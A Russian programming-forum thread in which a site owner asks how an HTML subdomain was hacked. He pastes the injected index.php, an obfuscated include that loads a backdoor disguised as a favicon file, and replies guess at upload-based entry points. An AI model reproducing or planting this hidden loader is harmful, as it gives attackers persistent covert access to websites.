0 / 0 / 1
Регистрация: 28.09.2013
Сообщений: 42
1

Взлом сайта на PHP

31.10.2017, 20:28. Показов 9284. Ответов 3
Метки нет (Все метки)

Author24 — интернет-сервис помощи студентам
Здравствуйте! Нужна помощь в странной ситуации. На основном домене стоит CMS последней версии и уязвимостей вроде не найдено. Но злоумышленники проникают каким-то образом на поддомен, который находится в другой папке на хостинге.
Там нет не то что CMS нет даже php. Там HTML сайт.
В каждой папке появился index.php а имеющийся index.html заменили на index.html.bak.bak
Код встроенного в сайт index.php
PHP
1
2
3
4
5
6
7
8
9
<?php
/*33a97*/
 
@include "\x2fhome\x2fuser\x73/s/s\x65rgx/\x64omai\x6es/si\x74es.s\x79berm\x65dia.\x72u/73\x33/dis\x74r/fa\x76icon\x5f314c\x387.ic\x6f";
 
/*33a97*/
 
 
echo file_get_contents('index.html.bak.bak');
В разных папках код отличается.
Пароли на хостинг-панель,FTP и MySQL стоят сложнейшие 12-15 символов в разном регистре со спецсимволами. Брутфорс отпадает сразу. Изначально права на файлы и папки стояли 744. После атаки они все поменялись на 755. Каким образом не пойму???
Хостер пока ничего не объясняет толком. Все списывает на уязвимость в CMS. Хотя причем CMS и поддомен в другой папке на хостинге?
Кто-нибудь сталкивался с таким чудом? И если да, то как бороться?
0
Programming
Эксперт
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
31.10.2017, 20:28
Ответы с готовыми решениями:

Взлом сайта
Вообщем написал я тут мини cms свою, она по адресу (Прошу модеров не счесть за рекламу эту ссылку,...

Можно ли предотвратить взлом базы средствами PHP
вот к примеру есть база данных линуксовая для флеш, но чтобы взлом через флеш был маловероятен,...

Возможный взлом сайта
Доброго времени суток. На главной странице моего сайта появилось сообщение следующего содержания:...

Взлом сайта ДЛЕ
Здравствуйте на моем сайте появился сторонний код такого вида &lt;iframe...

3
29 / 26 / 18
Регистрация: 02.04.2015
Сообщений: 314
31.10.2017, 22:32 2
Вариантов может быть масса, первый пришедший в голову: когда в "чистом html" реализована загрузка файла на сервер без должной проверки содержания/пути загрузки. Злоумышленник может банально вместо "картинки для аватара" загрузить собственный сценарий, после чего запустить его из браузера.
0
0 / 0 / 1
Регистрация: 28.09.2013
Сообщений: 42
31.10.2017, 23:18  [ТС] 3
Не знаю как насчет загрузки файлов на сервер без php обработчика формы. Но на поддомене находится сайт без каких либо форм. Обычный HTML текст с картинками и менюшкой. Всё! Там невозможно что либо загрузить через сам сайт.
0
74 / 29 / 4
Регистрация: 16.10.2017
Сообщений: 95
01.11.2017, 12:12 4
Цитата Сообщение от yotobo Посмотреть сообщение
Не знаю как насчет загрузки файлов на сервер без php обработчика формы. Но на поддомене находится сайт без каких либо форм. Обычный HTML текст с картинками и менюшкой. Всё! Там невозможно что либо загрузить через сам сайт.
Если например там можно писать комментарии, это тоже вариант загрузки.
0
01.11.2017, 12:12
IT_Exp
Эксперт
87844 / 49110 / 22898
Регистрация: 17.06.2006
Сообщений: 92,604
01.11.2017, 12:12
Помогаю со студенческими работами здесь

Взлом локального сайта
Как взломать сайт через SQL запрос если выдаёт ошибку при вводе '&quot;' и нажатии submit ?: Warning:...

Наказание за взлом университетского сайта
Всем привет. Имею очень важный вопрос и надеюсь на вашу потдержку. Вообщем учусь я в...

Взлом сайтов Попова (PhP)
Как взломать сайты написанные Поповым?

Возможен ли взлом сайта через Flash приложение
Добрый вечер уважаемые программисты, интересует меня такой вопрос, возможно-ли взломать сайт на...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
4
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin
Copyright ©2000 - 2024, CyberForum.ru